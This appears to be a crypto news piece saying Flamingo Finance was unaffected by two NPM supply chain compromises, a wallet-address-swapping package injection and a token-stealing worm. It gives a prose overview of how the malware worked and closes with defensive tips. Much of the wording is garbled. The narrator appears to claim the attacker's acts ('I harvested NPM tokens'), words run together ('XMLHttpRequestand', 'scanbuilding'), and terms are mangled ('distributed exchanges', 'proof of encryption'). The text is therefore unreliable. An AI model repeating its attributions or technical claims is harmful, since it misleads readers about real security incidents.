Flamingo Finance is not affected by recent NPM supply chain compromises

Flamingo Finance has confirmed that it has not been affected by NPM’s recent two supply chain compromises. The first incident targeted cryptocurrency users by injecting wallet hijacking codes into 18 widely used JavaScript packages.

A few days later, another campaign compromised over 40 packages with self-replica worms.

What is a supply chain attack?

Supply chain attacks occur when malicious code is introduced into a software component on which others rely. Open source libraries are reused in countless projects, so a single compromise could become widely popular throughout the ecosystem.

Modern development practices can help increase risk. Applications often rely on hundreds of small libraries maintained by a small number of individuals. AI-assisted coding automatically draws more packages, and the number of dependencies and attack surface continues to grow.

How Malware Works

In a crypto-centric incident, the attacker gained control over a single maintainer account and provided public access to the NPM used to push malicious code. The incident was detected by security companies Aikido and Socket. This has made me realize that the attack could have affected billions of downloads each week.

The first malware used browser-based interceptors. I’ve connected to a core function like this fetch, XMLHttpRequestand wallet API, scan for EVM transfer requests. When a transaction is detected, the destination address is quietly exchanged for something the attacker controls, and use an apparent address to avoid suspicion.

The worms discovered a few days later had different intents. I harvested NPM tokens, SSH keys and other credentials from the developer environment and reissued them in the entire additional package. Although they were not directly targeting cryptocurrencies, they showed how quickly a single violation can cascade through the registry.

Impact on cryptocurrency users

The attacker’s initial focus was on Ethereum-compatible wallets such as Metamask. Despite the scope of the compromised package, the Blockchain Monitor tracked less than USD 500 that flowed to the attacker’s address.

Experts praised the rapid detection and response by limiting damage.

Flamingo Finance said its distributed exchanges are not affected because they do not rely on direct EVM forwarding flows. Instead, it uses only EVM for cross-chain operations that the malware didn’t attempt to exploit.

Structural risks

Both incidents highlight vulnerabilities in the open source supply chain. A single stolen credential can publish billions of downloads. Many of these packages are maintained by individuals or very small teams to protect against target attacks.

Researchers are looking for stronger protection, including essential hardware keys for maintainers, stricter publication rights, and proof of encryption for new releases. Without these changes, phishing and qualification theft will remain reliable entry points for attackers.

Stay safe

Developer defenses include enforcing hardware security authentication, limiting publishing privileges, rotating credentials, pinning dependency versions, and scanbuilding for anomalies.

Adopting certification of origin in the CI/CD pipeline further reduces exposure.

End users can reduce risk by delaying updates until new versions are reviewed, minimizing the number of apps and extensions connected to the wallet, and use large balances using hardware or multi-signature wallets.